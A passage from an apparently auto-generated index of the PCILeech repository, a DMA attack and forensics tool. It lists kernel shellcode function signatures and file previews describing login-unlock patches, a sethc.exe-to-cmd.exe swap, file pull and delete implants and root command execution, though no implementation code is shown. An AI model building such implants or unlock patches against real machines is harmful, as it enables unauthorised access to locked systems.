function BOOLEAN (line 518) | BOOLEAN GetKApcIsAlertable(_In_ PEPROCESS pEProcess, _In_ PETHREAD pEThr...
function PETHREAD (line 528) | PETHREAD GetPEThread(_In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_FUNCTIONS2...
function VOID (line 579) | VOID ActionDefault_QueueApcState(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTION...
function VOID (line 642) | VOID ActionDefault(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PK...
function NTSTATUS (line 721) | NTSTATUS GetProcessNameFromPid(_In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_...
function NTSTATUS (line 735) | NTSTATUS GetPidFromPsName(_In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_FUNCT...
function VOID (line 774) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_pskill.c
type CLIENT_ID (line 15) | typedef struct _CLIENT_ID {
type CLIENT_ID (line 19) | typedef CLIENT_ID *PCLIENT_ID;
type KERNEL_FUNCTIONS2 (line 27) | typedef struct tdKERNEL_FUNCTIONS2 {
function VOID (line 43) | VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUN...
function VOID (line 57) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_pslist.c
type KERNEL_FUNCTIONS2 (line 15) | typedef struct tdKERNEL_FUNCTIONS2 {
function VOID (line 29) | VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUN...
type SYSTEM_PROCESS_INFORMATION (line 41) | typedef struct _SYSTEM_PROCESS_INFORMATION {
function NTSTATUS (line 56) | NTSTATUS GetProcessNameFromPid(_In_ PKERNEL_FUNCTIONS fnk, _In_ PKERNEL_...
function NTSTATUS (line 70) | NTSTATUS ActionDefault(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In...
function VOID (line 121) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_stage3_c.c
type QWORD (line 9) | typedef unsigned __int64 QWORD, *PQWORD;
type __int64 (line 10) | typedef __int64 PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
type CLIENT_ID (line 14) | typedef struct _CLIENT_ID {
type CLIENT_ID (line 18) | typedef CLIENT_ID *PCLIENT_ID;
type _IRQL_requires_same_ (line 20) | typedef _IRQL_requires_same_ _Function_class_(KSTART_ROUTINE)
type KSTART_ROUTINE (line 23) | typedef KSTART_ROUTINE *PKSTART_ROUTINE;
type UNICODE_STRING (line 25) | typedef struct _UNICODE_STRING {
type UNICODE_STRING (line 30) | typedef UNICODE_STRING *PUNICODE_STRING;
type OBJECT_ATTRIBUTES (line 32) | typedef struct _OBJECT_ATTRIBUTES {
type OBJECT_ATTRIBUTES (line 40) | typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
type CONST (line 41) | typedef CONST OBJECT_ATTRIBUTES
type MEMORY_CACHING_TYPE (line 43) | typedef enum _MEMORY_CACHING_TYPE {
type PHYSICAL_MEMORY_RANGE (line 53) | typedef struct _PHYSICAL_MEMORY_RANGE {
type MODE (line 58) | typedef enum _MODE {
type NTOS (line 82) | typedef struct tdNTOS {
type KMDDATA (line 145) | typedef struct tdKMDDATA {
function DWORD (line 182) | DWORD HashROR13A(_In_ LPCSTR sz)
function QWORD (line 199) | QWORD PEGetProcAddressH(_In_ QWORD hModule, _In_ DWORD dwProcNameH)
function VOID (line 226) | VOID stage3_c_EntryPoint(PKMDDATA pk)
function VOID (line 275) | VOID stage3_c_MainCommandLoop(PKMDDATA pk)
FILE: pcileech_shellcode/wx64_umd_exec_c.c
type QWORD (line 19) | typedef unsigned __int64 QWORD, *PQWORD;
type USERSHELL_BUFFER_IO (line 54) | typedef struct tUSERSHELLBUFFERIO {
type UMD_EXEC_CONTEXT_HANDLES (line 62) | typedef struct tdUMD_EXEC_CONTEXT_HANDLES {
type UMD_EXEC_CONTEXT_FULL (line 69) | typedef struct tdUMD_EXEC_CONTEXT_FULL {
function BOOL (line 142) | BOOL UserShellIsProcessRunning(PUMD_EXEC_CONTEXT_FULL ctx)
function VOID (line 148) | VOID UserShellCleanup(PUMD_EXEC_CONTEXT_FULL ctx)
function BOOL (line 165) | inline BOOL UserShellExec(PUMD_EXEC_CONTEXT_FULL ctx)
function VOID (line 190) | VOID UserShellThreadWriter(PUMD_EXEC_CONTEXT_FULL ctx)
function VOID (line 215) | VOID UserShellThreadReader(PUMD_EXEC_CONTEXT_FULL ctx)
function VOID (line 238) | VOID c_EntryPoint(PUMD_EXEC_CONTEXT_FULL ctx)
FILE: pcileech_shellcode/wx64_unlock.c
type __int64 (line 22) | typedef __int64 PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
type PHYSICAL_MEMORY_RANGE (line 24) | typedef struct _PHYSICAL_MEMORY_RANGE {
type IDT_DESCRIPTOR (line 30) | typedef struct _IDT_DESCRIPTOR {
type IDTR (line 36) | typedef struct _IDTR {
type KERNEL_FUNCTIONS2 (line 46) | typedef struct tdKERNEL_FUNCTIONS2 {
function VOID (line 76) | VOID InitializeKernelFunctions2(_In_ QWORD qwNtosBase, _Out_ PKERNEL_FUN...
type SIGNATURE_CHUNK (line 94) | typedef struct tdSignatureChunk {
type SIGNATURE (line 100) | typedef struct tdSignature {
function NTSTATUS (line 110) | NTSTATUS Unlock_FindAndPatch(_In_ PKERNEL_FUNCTIONS2 fnk2, _Inout_ PBYTE...
function NTSTATUS (line 133) | NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase)
function VOID (line 412) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: pcileech_shellcode/wx64_vfs.c
type VFS_OPERATION (line 35) | typedef struct tdVFS_OPERATION {
type VFS_RESULT_FILEINFO (line 46) | typedef struct tdVFS_RESULT_FILEINFO {
type FILE_BOTH_DIR_INFORMATION (line 61) | typedef struct _FILE_BOTH_DIR_INFORMATION {
function NTSTATUS (line 89) | NTSTATUS VfsWrite(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PVF...
function NTSTATUS (line 113) | NTSTATUS VfsRead(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PVFS...
function NTSTATUS (line 134) | NTSTATUS VfsList(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PVFS...
function NTSTATUS (line 181) | NTSTATUS VfsCreate(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PV...
function NTSTATUS (line 198) | NTSTATUS VfsDelete(_In_ PKMDDATA pk, _In_ PKERNEL_FUNCTIONS fnk, _In_ PV...
function VOID (line 215) | VOID c_EntryPoint(_In_ PKMDDATA pk)
FILE: usb3380_flash/linux/pcileech_flash.c
function _action_flash_verify (line 52) | static int _action_flash_verify(unsigned char *pbar0)
function _action_flash_write (line 69) | static void _action_flash_write(unsigned char *pbar0)
function _action_flash_writeverify (line 91) | static int _action_flash_writeverify(unsigned char *pbar0)
function _action_flash_2 (line 124) | static int _action_flash_2(struct pci_dev *pdev)
function _action_flash_1 (line 170) | static int _action_flash_1(void) {
function pcileech_flash_init (line 192) | static int pcileech_flash_init(void) {
function pcileech_flash_exit (line 197) | static void pcileech_flash_exit(void) {
FILE: usb3380_flash/windows/USB3380Flash/USB3380Flash.c
function _action_flash_verify (line 26) | static int _action_flash_verify(unsigned char *pbar0)
function _action_flash_write (line 43) | static void _action_flash_write(unsigned char *pbar0)
function _action_flash_writeverify (line 65) | static int _action_flash_writeverify(unsigned char *pbar0)
function NTSTATUS (line 98) | NTSTATUS _EvtDevicePrepareHardware(_In_ WDFDEVICE Device, _In_ WDFCMRESL...
function NTSTATUS (line 135) | NTSTATUS _EvtDeviceAdd(_In_ WDFDRIVER Driver, _Inout_ PWDFDEVICE_INIT De...
function NTSTATUS (line 146) | NTSTATUS _EvtDeviceAdd_FlashDisable(_In_ WDFDRIVER Driver, _Inout_ PWDFD...
function NTSTATUS (line 153) | NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_ST...
FILE: usb3380_flash/windows/USB3380Flash_Installer/installer.c
function BOOL (line 86) | BOOL InsertCertificate(_In_ PCCERT_CONTEXT pCert)
function BOOL (line 97) | BOOL DeleteCertificate(_In_ PCCERT_CONTEXT pCert)
function BOOL (line 115) | BOOL RegistrySetDisableDriver(BOOL isDisable) {
function main (line 126) | int main(_In_ int argc, _In_ char* argv[])
[
{
"path": ".gitignore",
"chars": 171,
"preview": "/.vs\n/files/pcileech\n/files/lib\n/files/temp\n/files/x86/lib\n/files/USB3380Flash\n/files/USB3380Flash_installer\n*.bin\n*.co"
},
{
"path": "LICENSE",
"chars": 34523,
"preview": " GNU AFFERO GENERAL PUBLIC LICENSE\n Version 3, 19 November 2007\n\n Copyright (C)"
},
{
"path": "files/Certs/readme.txt",
"chars": 592,
"preview": "Example commands for generating test certificates used for gRPC mTLS remote connections.\n\nPassword to the .pfx files: te"
},
{
"path": "files/agent-find-rwx.py",
"chars": 1572,
"preview": "# Example file to demonstrate remote python functionality with the LeechAgent.\n#\n# Example:\n# pcileech.exe -device <devi"
},
{
"path": "files/pcileech.txt",
"chars": 84,
"preview": "Download the latest binaries from https://github.com/ufrisk/pcileech/releases/latest"
},
{
"path": "files/pcileech_gensig.cfg",
"chars": 11192,
"preview": "# Configuration data for the Windows 8.1/10/2012R2/2016 pagetable hijack signature generator.\n# The signatures for the p"
},
{
"path": "files/signature_info.txt",
"chars": 4142,
"preview": "Signature Guide for Search/Patch signatures and Kernel Module signatures\n==============================================="
},
{
"path": "files/stickykeys_cmd_win.sig",
"chars": 829,
"preview": "# replace sethc.exe with cmd.exe in memory on Windows\n# Signatur for PCILeech version 1.1\n# syntax: see signature_info.t"
},
{
"path": "files/unlock_macos.sig",
"chars": 309,
"preview": "# unlock signatures for macOS\n# syntax: see signature_info.txt for more information.\n#\n#\n# CFOpenDirectory!ODRecordVerif"
},
{
"path": "files/unlock_win10x64.sig",
"chars": 4211,
"preview": "# Unlock Signatures for Local and AD Accounts for Windows 10 x64 version\n#\n# Method 1: (faster):\n# 1.1 check pid of lsas"
},
{
"path": "files/unlock_win10x86.sig",
"chars": 3595,
"preview": "# Unlock Signatures for Local and AD Accounts for Windows 10 x86 version\n#\n# Method 1: (faster):\n# 1.1 check pid of lsas"
},
{
"path": "files/unlock_win11x64.sig",
"chars": 2280,
"preview": "# Unlock Signatures for Local and AD Accounts for Windows 11 x64 version\n#\n# Method 1: (faster):\n# 1.1 check pid of lsas"
},
{
"path": "files/unlock_win8x64.sig",
"chars": 434,
"preview": "# unlock signatures for Windows 8.1\n# syntax: see signature_info.txt for more information.\n#\n#\n# signature for Windows 8"
},
{
"path": "files/unlock_winvistax64.sig",
"chars": 304,
"preview": "# unlock signatures for Windows Vista x64 version\n# syntax: see signature_info.txt for more information.\n#\n#\n# signature"
},
{
"path": "files/win7x64.kmd",
"chars": 2738,
"preview": "# signatures for Windows 7 x64 version\n#\n#\n# ntfs.sys signed on 2010-11-20 14:33:45 (MJ_CREATE) | (WIN7SP1-INSTALL)\n7F0,"
},
{
"path": "files/winvistax64.kmd",
"chars": 2376,
"preview": "# unlock signatures for Windows Vista x64 version\n# syntax: see signature_info.txt for more information.\n#\n# NB! stage2 "
},
{
"path": "includes/dokan.h",
"chars": 45688,
"preview": "/*\n Dokan : user-mode file system library for Windows\n\n Copyright (C) 2015 - 2019 Adrien J. <liryna.stark@gmail.com> a"
},
{
"path": "includes/fileinfo.h",
"chars": 48371,
"preview": "/*\n Dokan : user-mode file system library for Windows\n\n Copyright (C) 2015 - 2019 Adrien J. <liryna.stark@gmail.com> a"
},
{
"path": "includes/leechcore.h",
"chars": 26108,
"preview": "// leechcore.h : external header of the LeechCore library.\n//\n// LeechCore is a library which abstracts away reading and"
},
{
"path": "includes/leechgrpc.h",
"chars": 12869,
"preview": "// leechgrpc.h : external header of the libleechgrpc library.\n//\n// libleechgrpc is a library used by LeechCore to commu"
},
{
"path": "includes/libpdbcrust.h",
"chars": 2777,
"preview": "// C library wrapper around the rust PDB crate and related useful utilities.\n//\n// (c) Ulf Frisk, 2023\n// Author: Ulf Fr"
},
{
"path": "includes/public.h",
"chars": 17800,
"preview": "/*\n Dokan : user-mode file system library for Windows\n\n Copyright (C) 2017 - 2021 Google, Inc.\n Copyright (C) 2015 - "
},
{
"path": "includes/vmmdll.h",
"chars": 128226,
"preview": "// vmmdll.h : header file to include in projects that use vmm.dll / vmm.so\n// \n// Please also consult the guide at: http"
},
{
"path": "includes/vmmyara.h",
"chars": 11435,
"preview": "// vmmyara.h : External headers of the YARA API wrapper for MemProcFS.\n//\n// (c) Ulf Frisk, 2023\n// Author: Ulf Frisk, p"
},
{
"path": "pcileech/Makefile",
"chars": 1196,
"preview": "CC=gcc\nCFLAGS +=-I. -I../includes -D LINUX -D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -pthread\nCFLAGS += -fPIE -fPIC -fstack"
},
{
"path": "pcileech/Makefile.macos",
"chars": 2110,
"preview": "CC=clang\nCFLAGS += -I. -I../includes -D MACOS -D _GNU_SOURCE -D _FILE_OFFSET_BITS=64 -pthread\nCFLAGS += -fPIE -fPIC -fst"
},
{
"path": "pcileech/charutil.c",
"chars": 56995,
"preview": "// charutil.c : implementation of various character/string utility functions.\n//\n// (c) Ulf Frisk, 2021-2026\n// Author: "
},
{
"path": "pcileech/charutil.h",
"chars": 16328,
"preview": "// charutil.h : definitions of various character/string utility functions.\n//\n// (c) Ulf Frisk, 2021-2026\n// Author: Ulf"
},
{
"path": "pcileech/device.c",
"chars": 8294,
"preview": "// device.c : implementation related to hardware devices.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, pcileech@"
},
{
"path": "pcileech/device.h",
"chars": 2471,
"preview": "// device.h : definitions related to the hardware devices.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, pcileech"
},
{
"path": "pcileech/executor.c",
"chars": 26608,
"preview": "// executor.c : implementation related 'code execution' and 'console redirect' functionality.\n//\n// (c) Ulf Frisk, 2016-"
},
{
"path": "pcileech/executor.h",
"chars": 2343,
"preview": "// executor.h : definitions related to 'code execution' and 'console redirect' functionality.\n//\n// (c) Ulf Frisk, 2016-"
},
{
"path": "pcileech/extra.c",
"chars": 21157,
"preview": "// extra.c : implementation related various extra functionality such as exploits.\n//\n// (c) Ulf Frisk, 2016-2026\n// Auth"
},
{
"path": "pcileech/extra.h",
"chars": 1656,
"preview": "// extra.h : definitions related to various extra functionality such as exploits.\n//\n// (c) Ulf Frisk, 2016-2026\n// Auth"
},
{
"path": "pcileech/help.c",
"chars": 54222,
"preview": "// help.c : implementation related to displaying help texts.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, pcilee"
},
{
"path": "pcileech/help.h",
"chars": 292,
"preview": "// help.h : definitions related to displaying help texts.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, pcileech@"
},
{
"path": "pcileech/kmd.c",
"chars": 94757,
"preview": "// kmd.c : implementation related to operating systems kernel modules functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n// A"
},
{
"path": "pcileech/kmd.h",
"chars": 1593,
"preview": "// kmd.h : definitions related to operating systems kernel modules functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n// Auth"
},
{
"path": "pcileech/memdump.c",
"chars": 16084,
"preview": "// memdump.c : implementation related to memory dumping functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Fri"
},
{
"path": "pcileech/memdump.h",
"chars": 1789,
"preview": "// memdump.h : definitions related to memory dumping functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk,"
},
{
"path": "pcileech/mempatch.c",
"chars": 11575,
"preview": "// mempatch.c : implementation related to operating systems unlock/patch functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n/"
},
{
"path": "pcileech/mempatch.h",
"chars": 699,
"preview": "// mempatch.h : definitions related to memory patch / operating system unlock functionality.\n//\n// (c) Ulf Frisk, 2016-2"
},
{
"path": "pcileech/ob/ob.h",
"chars": 46532,
"preview": "// ob.h : definitions related to the object manager and object manager collections.\n//\n// (c) Ulf Frisk, 2018-2025\n// Au"
},
{
"path": "pcileech/ob/ob_cachemap.c",
"chars": 8669,
"preview": "// ob_cachemap.c : implementation of object manager cached map functionality.\n//\n// The map (ObCacheMap) implements an e"
},
{
"path": "pcileech/ob/ob_core.c",
"chars": 5705,
"preview": "// ob_core.c : implementation of object manager core functionality.\n//\n// The object manager is a minimal non-threaded w"
},
{
"path": "pcileech/ob/ob_map.c",
"chars": 33645,
"preview": "// ob_map.c : implementation of object manager hashed map functionality.\n//\n// The map is a key-value map that may, as a"
},
{
"path": "pcileech/ob/ob_set.c",
"chars": 19235,
"preview": "// ob_set.c : implementation of object manager hashed value set functionality.\n//\n// The hashed value set (ObSet) provid"
},
{
"path": "pcileech/oscompatibility.c",
"chars": 14539,
"preview": "// oscompatibility.c : pcileech windows/linux compatibility layer.\n//\n// (c) Ulf Frisk, 2017-2026\n// Author: Ulf Frisk, "
},
{
"path": "pcileech/oscompatibility.h",
"chars": 12687,
"preview": "// oscompatibility.h : pcileech windows/linux compatibility layer.\n//\n// (c) Ulf Frisk, 2017-2026\n// Author: Ulf Frisk, "
},
{
"path": "pcileech/pcileech.c",
"chars": 18679,
"preview": "// pcileech.c : implementation of core pcileech functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, pcil"
},
{
"path": "pcileech/pcileech.h",
"chars": 9227,
"preview": "// pcileech.h : definitions for pcileech - dump memory and unlock computers with a USB3380 device using DMA.\n//\n// (c) U"
},
{
"path": "pcileech/pcileech.vcxproj",
"chars": 11933,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"15.0\" xmlns=\"http://schemas.micros"
},
{
"path": "pcileech/pcileech.vcxproj.filters",
"chars": 5466,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "pcileech/pcileech.vcxproj.user",
"chars": 2708,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "pcileech/shellcode.h",
"chars": 161541,
"preview": "// shellcode.h : default shellcode used by pcileech in default scenarios.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf "
},
{
"path": "pcileech/statistics.c",
"chars": 10889,
"preview": "// statistics.c : implementation of statistics related functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Fris"
},
{
"path": "pcileech/statistics.h",
"chars": 3474,
"preview": "// statistics.h : definitions of statistics related functionality.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, "
},
{
"path": "pcileech/umd.c",
"chars": 13833,
"preview": "// umd.c : implementation related to various user-mode functionality supported\n// by MemProcFS / vmm.dll integra"
},
{
"path": "pcileech/umd.h",
"chars": 728,
"preview": "// umd.c : implementation related to various user-mode functionality supported\n// by the Memory Process File Sys"
},
{
"path": "pcileech/util.c",
"chars": 32374,
"preview": "// util.c : implementation of various utility functions.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, pcileech@f"
},
{
"path": "pcileech/util.h",
"chars": 10582,
"preview": "// util.h : definitions of various utility functions.\n//\n// (c) Ulf Frisk, 2016-2026\n// Author: Ulf Frisk, pcileech@friz"
},
{
"path": "pcileech/version.h",
"chars": 1075,
"preview": "#define STRINGIZE2(s) #s\n#define STRINGIZE(s) STRINGIZE2(s)\n\n#define VERSION_MAJOR 4\n#define VERSION_MINOR"
},
{
"path": "pcileech/vfs.c",
"chars": 34408,
"preview": "// vfs.c : implementation of functions related to virtual file system support.\n//\n// (c) Ulf Frisk, 2017-2026\n// Author:"
},
{
"path": "pcileech/vfs.h",
"chars": 1340,
"preview": "// vfs.h : definitions related to virtual file system support.\n//\n// (c) Ulf Frisk, 2017-2026\n// Author: Ulf Frisk, pcil"
},
{
"path": "pcileech/vfslist.c",
"chars": 13086,
"preview": "// vfslist.h : definitions related to vfs directory listings.\n//\n// (c) Ulf Frisk, 2021-2026\n// Author: Ulf Frisk, pcile"
},
{
"path": "pcileech/vfslist.h",
"chars": 3055,
"preview": "// vfslist.h : definitions related to virtual file system support.\n//\n// (c) Ulf Frisk, 2018-2026\n// Author: Ulf Frisk, "
},
{
"path": "pcileech/vmmx.c",
"chars": 1709,
"preview": "// vmmx.h : implementation of external memory process file system functionality.\n//\n// (c) Ulf Frisk, 2020-2026\n// Autho"
},
{
"path": "pcileech/vmmx.h",
"chars": 756,
"preview": "// vmmx.h : definitions related to external memory process file system functionality.\n//\n// (c) Ulf Frisk, 2020-2026\n// "
},
{
"path": "pcileech.sln",
"chars": 6721,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.2872"
},
{
"path": "pcileech_shellcode/fbsdx64_common.c",
"chars": 216,
"preview": "// fbsdx64_common.c : support functions used by FreeBSD KMDs started by stage3 EXEC.\n// Compatible with FreeBSD x64.\n//\n"
},
{
"path": "pcileech_shellcode/fbsdx64_common.h",
"chars": 3059,
"preview": "// fbsdx64_common.h : declarations of commonly used shellcode functions\n// Compatible with FreeBSD x64.\n//\n// Author: Ul"
},
{
"path": "pcileech_shellcode/fbsdx64_common_a.asm",
"chars": 3217,
"preview": "; fbsdx64_common_a.asm : assembly to receive execution from stage3 exec command.\n; Compatible with FreeBSD x64.\n;\n; (c) "
},
{
"path": "pcileech_shellcode/fbsdx64_filepull.c",
"chars": 5287,
"preview": "// fbsdx64_filepull.c : kernel code to pull files from target system.\n// Compatible with FreeBSD x64.\n//\n// (c) Ulf Fris"
},
{
"path": "pcileech_shellcode/fbsdx64_stage2.asm",
"chars": 4913,
"preview": "; fbsdx64_stage2.asm : assembly to receive execution from stage1 shellcode.\n; Compatible with FreeBSD x64.\n;\n; (c) Ulf F"
},
{
"path": "pcileech_shellcode/fbsdx64_stage3.asm",
"chars": 5195,
"preview": "; fbsdx64_stage3.asm : assembly to receive execution from stage2 shellcode.\n; Compatible with FreeBSD x64.\n;\n; (c) Ulf F"
},
{
"path": "pcileech_shellcode/fbsdx64_stage3_c.c",
"chars": 7664,
"preview": "// fbsdx64_stage3_c.c : stage3 main shellcode.\n// Compatible with FreeBSD x64.\n//\n// (c) Ulf Frisk, 2016, 2017\n// Author"
},
{
"path": "pcileech_shellcode/info_kmd_core.txt",
"chars": 5793,
"preview": "# compile instructions for the various kernel module shellcode sources.\n#\n#======================================== UEFI"
},
{
"path": "pcileech_shellcode/lx64_common.c",
"chars": 1233,
"preview": "// lx64_common.c : support functions used by Linux x64 KMDs started by stage3 EXEC.\n// Compatible with Linux x64.\n//\n// "
},
{
"path": "pcileech_shellcode/lx64_common.h",
"chars": 5289,
"preview": "// lx64_common.h : declarations of commonly used shellcode functions\n// Compatible with Linux x64.\n//\n// Author: Ulf Fri"
},
{
"path": "pcileech_shellcode/lx64_common_a.asm",
"chars": 5647,
"preview": "; lx64_common_a.asm : assembly to receive execution from stage3 exec command.\n; Compatible with Linux x64.\n;\n; (c) Ulf F"
},
{
"path": "pcileech_shellcode/lx64_exec_root.c",
"chars": 2471,
"preview": "// lx64_exec_root.c : execute user-mode command from kernel\n//\n// compile with:\n// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /G"
},
{
"path": "pcileech_shellcode/lx64_filedelete.c",
"chars": 3292,
"preview": "// lx64_filedelete.c : kernel code to delete files from target system.\n// Compatible with Linux x64.\n//\n// (c) Ulf Frisk"
},
{
"path": "pcileech_shellcode/lx64_filepull.c",
"chars": 3325,
"preview": "// lx64_filepull.c : kernel code to pull files from target system.\n// Compatible with Linux x64.\n//\n// (c) Ulf Frisk, 20"
},
{
"path": "pcileech_shellcode/lx64_filepush.c",
"chars": 3775,
"preview": "// lx64_filepush.c : kernel code to push files to target system.\n// Compatible with Linux x64.\n//\n// (c) Ulf Frisk, 2016"
},
{
"path": "pcileech_shellcode/lx64_stage2.asm",
"chars": 8456,
"preview": "; lx64_stage2.asm : assembly to receive execution from stage1 shellcode.\n; Compatible with Linux x64.\n;\n; (c) Ulf Frisk,"
},
{
"path": "pcileech_shellcode/lx64_stage2_efi.asm",
"chars": 15521,
"preview": "; lx64_stage2_efi.asm : assembly to receive execution from hooked efi runtime services dispatch table.\n; Compatible with"
},
{
"path": "pcileech_shellcode/lx64_stage3.asm",
"chars": 11357,
"preview": "; lx64_stage3.asm : assembly to receive execution from stage2 shellcode.\n; Compatible with Linux x64.\n;\n; (c) Ulf Frisk,"
},
{
"path": "pcileech_shellcode/lx64_stage3_c.c",
"chars": 15040,
"preview": "// lx64_stage3_c.c : stage3 main shellcode.\n// Compatible with Linux x64.\n//\n// (c) Ulf Frisk, 2016-2024\n// Author: Ulf "
},
{
"path": "pcileech_shellcode/lx64_stage3_pre.asm",
"chars": 888,
"preview": "; lx64_stage3_pre.asm : assembly wait loop to wait for continue when executable code exists after.\n; Compatible with Lin"
},
{
"path": "pcileech_shellcode/lx64_vfs.c",
"chars": 14373,
"preview": "// lx64_vfs.c : kernel code to support the PCILeech file system.\n// Compatible with Linux x64.\n//\n// (c) Ulf Frisk, 2017"
},
{
"path": "pcileech_shellcode/macos_common.c",
"chars": 4821,
"preview": "// macos_common.c : support functions used by macOS KMDs started by stage3 EXEC.\n// Compatible with macOS.\n//\n// (c) Ulf"
},
{
"path": "pcileech_shellcode/macos_common.h",
"chars": 6684,
"preview": "// macos_common.h : definitions of commonly used shellcode functions\n// Compatible with macOS.\n//\n// Author: Ulf Frisk, "
},
{
"path": "pcileech_shellcode/macos_common_a.asm",
"chars": 5547,
"preview": "; macos_common_a.asm : assembly to receive execution from stage3 exec command.\n; Compatible with macOS.\n;\n; (c) Ulf Fris"
},
{
"path": "pcileech_shellcode/macos_filedelete.c",
"chars": 6203,
"preview": "// ax64_filedelete.c : kernel code to delete files on target system.\n// Compatible with Apple OS X.\n//\n// TODO: THIS IS "
},
{
"path": "pcileech_shellcode/macos_filepull.c",
"chars": 4356,
"preview": "// macos_filepull.c : kernel code to pull files from target system.\n// Compatible with Apple macOS.\n//\n// (c) Ulf Frisk,"
},
{
"path": "pcileech_shellcode/macos_filepush.c",
"chars": 4424,
"preview": "// macos_filepush.c : kernel code to push files to target system.\n// Compatible with Apple macOS.\n//\n// (c) Ulf Frisk, 2"
},
{
"path": "pcileech_shellcode/macos_stage2.asm",
"chars": 9160,
"preview": "; ax64_stage2.asm : assembly to receive execution from stage1 shellcode.\n; Compatible with OS X.\n;\n; (c) Ulf Frisk, 2016"
},
{
"path": "pcileech_shellcode/macos_stage3.asm",
"chars": 7169,
"preview": "; ax64_stage3.asm : assembly to receive execution from stage2 shellcode.\n; Compatible with OS X.\n;\n; (c) Ulf Frisk, 2016"
},
{
"path": "pcileech_shellcode/macos_stage3_c.c",
"chars": 10737,
"preview": "// ax64_stage3_c.c : stage3 main shellcode.\n// Compatible with macOS.\n//\n// (c) Ulf Frisk, 2016, 2017\n// Author: Ulf Fri"
},
{
"path": "pcileech_shellcode/macos_unlock.c",
"chars": 4793,
"preview": "// macos_unlock.c : kernel code to remove the password requirement when logging on to macOS.\n//\n// (c) Ulf Frisk, 2016, "
},
{
"path": "pcileech_shellcode/macos_vfs.c",
"chars": 14124,
"preview": "// macos_vfs.c : kernel code to support the PCILeech file system.\n// Compatible with Apple macOS.\n//\n// (c) Ulf Frisk, 2"
},
{
"path": "pcileech_shellcode/pcileech_shellcode.vcxproj",
"chars": 5583,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"15.0\" xmlns=\"http://schemas.micros"
},
{
"path": "pcileech_shellcode/pcileech_shellcode.vcxproj.filters",
"chars": 8900,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "pcileech_shellcode/pcileech_shellcode.vcxproj.user",
"chars": 160,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbui"
},
{
"path": "pcileech_shellcode/statuscodes.h",
"chars": 1120,
"preview": "// statuscodes_common.h : status codes for non-windows kernel implants.\n//\n// Author: Ulf Frisk, pcileech@frizk.net\n//\n\n"
},
{
"path": "pcileech_shellcode/uefi_common.c",
"chars": 207,
"preview": "// uefi_common.c : support functions used by UEFI x64 KMDs started by stage3 EXEC.\n// Compatible with UEFI x64.\n//\n// (c"
},
{
"path": "pcileech_shellcode/uefi_common.h",
"chars": 9300,
"preview": "// uefi_common.h : declarations of commonly used shellcode functions\n// Compatible with UEFI.\n//\n// Author: Ulf Frisk, p"
},
{
"path": "pcileech_shellcode/uefi_common_a.asm",
"chars": 1686,
"preview": "; uefi_common_a.asm : assembly to receive execution from stage3 exec command.\n; Compatible with UEFI x64.\n;\n; (c) Ulf Fr"
},
{
"path": "pcileech_shellcode/uefi_kmd.asm",
"chars": 2840,
"preview": "; uefi_kmd.asm : assembly to receive execution from hooked UEFI\n; function call. Compatible with UEFI x64.\n;\n; - Executi"
},
{
"path": "pcileech_shellcode/uefi_kmd_c.c",
"chars": 9411,
